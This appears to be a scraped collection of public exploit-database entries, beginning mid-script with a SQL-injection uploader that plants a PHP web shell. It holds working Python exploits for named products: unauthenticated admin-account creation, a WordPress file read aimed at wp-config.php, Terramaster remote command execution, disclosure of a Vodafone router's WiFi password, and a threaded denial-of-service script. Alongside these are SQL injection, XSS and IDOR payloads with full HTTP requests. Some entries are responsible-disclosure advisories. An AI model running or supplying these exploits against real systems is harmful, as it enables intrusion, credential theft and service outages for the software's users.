SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())

print("\n\nShell Uploading...")
status = requests.get(sqlPage+SQLtoRCE)

shellOutput = requests.get(url+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
print("\nShell Path : " + url+shellname+".php")
HireHackking 
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Windows

import requests
import json

url = input('Url:')
if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url
if not url.endswith('/'):
    url = url + "/"

Username = "tago"
Password = "tagoletta"

reqUrl = url + "classes/Users.php?f=save"

reqHeaders = {
    "Accept": "*/*",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
    "Origin": url}

reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"

resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

if resp.status_code == 200:
    print("Admin account created")
    reqUrl = url + "classes/Login.php?f=login"

    reqHeaders = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
        "Origin": url
        }

    reqData = {"username": ""+Username+"", "password": ""+Password+""}

    resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)

    data = json.loads(resp.text)
    status = data["status"]

    if status == "success":
        print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)
    else:
        print("Exploited but not loginned")
else:
    print("Not injectable")
HireHackking 
# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 03-OCT-2021
# Exploit Author: Akash Rajendra Patil
# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php
# Software Link: https://www.yahoobaba.net/project/library-system-in-php
# Version: V 1.0
# Tested on: WAMPP
# Description #

Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation.

# Proof of Concept (PoC) :
#Exploit:
1) Goto: http://localhost/library-system/dashboard.php
2) Login as admin using test credentials: admin/admin
3) Goto: http://localhost/library-system/update-publisher.php?pid=12
4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script>
5) Click on Save
6) Our payload is fired and stored
HireHackking 
# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
# Date: 23/12/2021
# Exploit Authors: Nicole Sheinin, Liad Levy
# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/
# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/
# Version: versions <= 2.2.2
# Tested on: MacOS 
# CVE: CVE-2021-39312
# Github repo: 

#!/usr/bin/env python3

import argparse, textwrap
import requests
import sys

parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter)                     
group_must = parser.add_argument_group('must arguments')
group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) 
parser.add_argument("-p","--payload", help="Path to read  [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) 

args = parser.parse_args()

if len(sys.argv) <= 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")          
    sys.exit()  

HOST = args.url
PAYLOAD = args.payload

url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST)
payload = "/scripts/simple.php/{}".format(PAYLOAD)


r = requests.post(url,data={'src': payload})
if r.status_code == 200:
  print(r.text)
else:
  print("No exploit found")
HireHackking 
# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
# Date: 28/12/2021
# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)
# Vendor Homepage: https://www.safarimontage.com/
# Version: 8.3 and 8.5
# Tested on: Ubuntu Linux [Firefox]
# CVE: CVE-2021-45425

# Proof of Concept:

GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1
Host: vulnIP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=SSSION; lang=en
Connection: close
HireHackking 
# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wiki.nettemp.tk
# Software Link: https://wiki.nettemp.tk
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)

Payload:

username: 1' or 1=1;--
password: \

Proof of Concept:

POST /index.php?id=status HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://vuln.com
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1

username=1%27+or+1%3D1%3B--&password=%5C&form_login=log
HireHackking 
# Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS)
# Date: 26/12/2021
# Exploit Author: Chinmay Vishwas Divekar
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: V 2.1
# Tested on: PopOS_20.10

*Steps to reproduce*

1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php
2) Enter xss payload  <img src=x onerror=alert(String.fromCharCode(88,83,83));> on various input fields.
3) Server Accepted our Payload in input fileds.

Affected input fields: Correspondence Address, Guardian Relation, Permanent Address
HireHackking 
# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)
# Date: 28/12/2021
# Exploit Author: Andres Ramos [Invertebrado]
# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm
# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en
# Version: AWebServer GhostBuilding 18
# Tested on: Android

#!/usr/bin/python3

# *********************************************************************************
# * 	               	 Author: Andres Ramos [Invertebrado]                      *
# *  AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash  *
# *********************************************************************************

import signal
import requests
from pwn import *

#Colors
class colors():
        GREEN = "\033[0;32m\033[1m"
        END = "\033[0m"
        RED = "\033[0;31m\033[1m"
        BLUE = "\033[0;34m\033[1m"
        YELLOW = "\033[0;33m\033[1m"
        PURPLE = "\033[0;35m\033[1m"
        TURQUOISE = "\033[0;36m\033[1m"
        GRAY = "\033[0;37m\033[1m"

exit = False

def def_handler(sig, frame):
	print(colors.RED + "\n[!] Exiting..." + colors.END)
	exit = True
	sys.exit(0)

	if threading.activeCount() > 1:
		os.system("tput cnorm")
		os._exit(getattr(os, "_exitcode", 0))
	else:
		os.system("tput cnorm")
		sys.exit(getattr(os, "_exitcode", 0))

signal.signal(signal.SIGINT, def_handler)

if len(sys.argv) < 3:
	print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)
	sys.exit(1)

url = sys.argv[1]
Tr = sys.argv[2]

def http():
	counter = 0
	p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)
	while True:
		r = requests.get(url)
		r = requests.get(url + "/mysqladmin")
		counter += 2
		p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)

		if exit:
			break

if __name__ == '__main__':

	threads = []

	try:
		for i in range(0, int(Tr)):
			t = threading.Thread(target=http)
			threads.append(t)

			sys.stderr = open("/dev/null", "w")

		for x in threads:
			x.start()

		for x in threads:
			x.join()

	except Exception as e:
		log.failure(str(e))
		sys.exit(1)
HireHackking 
# Exploit Title: Hospitalss Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

*SQL Injection*
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list.

*Attack Vector*
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

*Steps to reproduce:*
Step-1: On the dashboard navigate to 'Patient List', then go to 'Action' > 'View Records' page using the following URL:
http://localhost/hprms/admin/?page=patients/view_patient&id=1

Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.
HireHackking 
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Google Dork: intext:"BeyondTrust" "Redistribution Prohibited"
# Date: 30/12/2021
# Exploit Author: Malcrove
# Vendor Homepage: https://www.beyondtrust.com/
# Version: v6.0 and earlier versions

Summary:

Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.


Vulnerability Details:

Affected Endpoint: /appliance/login
Affected Parameter: login[password]
Request Method: GET or POST


Proof of concept (POC):

By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain.

http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password


Mitigation:

A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version.

- Time-Line:

    April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust)
    April 8, 2021: Recevied an initial reply from the vendor 
    Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1
    Dec 30, 2021: The Responsible public disclosure


- Credits
Ahmed Aboul-Ela (Malcrove)
HireHackking 
# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver
# Date: 30/12/2021
# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

*Insecure direct object references (IDOR)*
Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input.Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system.

*Attack Vector*
An attacker can takeover the Administrator's account

*Steps of reproduce:*
Note: in this case, we used two users, user1 as a staff with user id '4', and admin as an Administrator with user id '1'.

=====================================================================================================================================

Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account'

http://localhost/hprms/admin/?page=user

=====================================================================================================================================

Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite:

POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"

4
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"

user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"

admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------17632878732301879013646251239--

=====================================================================================================================================

Step-3: Change parameter id '4' to id '1'

POST /hprms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239
Content-Length: 806
Origin: http://localhost
Connection: close
Referer: http://localhost/hprms/admin/?page=user
Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="id"

1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="firstname"

user1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="lastname"

admin
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="username"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="password"

admin1
-----------------------------17632878732301879013646251239
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------17632878732301879013646251239--

=====================================================================================================================================

step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator.
HireHackking 
# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage:  https://www.trigonesoft.com/
# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe
# Tested Version: 3.61
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

TRIGONE Remote System Monitor Server RemoteSystemMonitorService          
C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe    
Auto

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RemoteSystemMonitorService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TRIGONE\Remote System Monitor Serv
er\RemoteSystemMonitorService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TRIGONE Remote System Monitor Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 12/24/2021
# Exploit Author: n0tme (thatsn0tmysite)
# Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/
# Vendor Homepage: https://www.terra-master.com/
# Version: TOS 4.2.X (4.2.15-2107141517)
# Tested on: 4.2.15, 4.2.10

#/bin/env python

import urllib3
import requests
import json
import argparse
import hashlib
import time
import os

TARGET = None 
MAC_ADDRESS = None
PWD = None
TIMESTAMP = None 

def tos_encrypt_str(toencrypt):
    key = MAC_ADDRESS[6:] 
    return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest()

def user_session(session, username):
    session.cookies.clear()
    cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)}
    if username == "guest":
        cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")}
    
    for name,value in cookies.items():
        session.cookies[name] = value

def download(session, path, save_as=None):
    user_session(session, "guest")
    r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path})
    filename = os.path.basename(path)
    if save_as is not None:
        filename = save_as
    with open(filename, "wb") as file:
        file.write(r.content)

def get_admin_users(session):
    download(session, "/etc/group", save_as="/tmp/terramaster_group")
    with open("/tmp/terramaster_group", "r") as groups:
        for line in groups:
            line = line.strip()
            fields = line.split(':')
            if fields[0] == "admin":
                users = fields[3].split(",")
                os.remove("/tmp/terramaster_group")
                return users  

if __name__ == '__main__':
    p = argparse.ArgumentParser()
    p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)")
    p.add_argument("--cmd", dest="cmd", help="Command to run", default="id")
    p.add_argument("-d", "--download", dest="download", help="Only download file", default=None)
    p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None)
    p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None)
    p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR")
    p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)")
    args = p.parse_args()
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    TARGET = args.target 

    s = requests.Session()
    if args.tor:
        s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}
    s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"})
    
    r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS")
    try:
        j = r.json()
        PWD = j["data"]["PWD"]
        MAC_ADDRESS = j["data"]["ADDR"]
    except KeyError:
        exit(1)
    
    TIMESTAMP = str(int(time.time()))
    s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP})
    s.headers.update({"authorization": PWD})

    if args.download != None:
        download(s, args.download, save_as=args.save_as)
        exit(0)

    #RCEs
    RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23",
          f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND
          f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND
    
    for admin in get_admin_users(s):
        user_session(s, admin)
        if args.create != None:
            user, password = args.create.split(":") 
            groups = json.dumps(["allusers", "admin"])
            r=s.post(f"{TARGET}/module/api.php?mobile/__construct")
            r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""})
            if "create user successful!" in str(r.content, "utf8"):
                print(r.content)
                break
            continue

        r = s.get(RCEs[args.rce])
        content = str(r.content, "utf-8")
        if "<!--user login-->" not in content: 
            print(content)
    exit(0)
HireHackking 
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
# Date: 2021-12-30
# Exploit Author: Milad Karimi
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Ubuntu 19.04

[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]

[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]

[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]

[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]

[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]

[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]

[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
HireHackking 
# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Date: 01/01/2022
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.vodafone.es/
# Software Link: N/A
# Version: Firmware version Vodafone-H-500-s-v3.5.10
# Hardware model: Sercomm VFH500

# The WiFi access point password gets disclosed just by performing a GET request with certain headers

import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
sys.exit()
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101

Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}

req=requests.get(url, headers=headers, cookies=cookies)
result=json.loads(req.text)[3].get("wifi_password")
print("[+] The wifi password is: "+result)
HireHackking 
# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection
# Date: 26/12/2021
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://opensis.com
# Software Link: https://opensis.com
# Version: 8.0 Community Edition
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com

'''

DESCRIPTION

A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php.

The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php.

Example:

POST /TransferredOutModal.php?modfunc=detail

Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5

if an attacker exploits this vulnerability, attacker may access private data in the database system.

EXPLOITATION

POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: localhost
User-Agent: user-agent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cookie
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5

Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs

Example Payloads:

Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5


ABOUT SECURITY FOR EVERYONE TEAM

We are a team that has been working on cyber security in the industry for a long time.

In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.

We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools

'''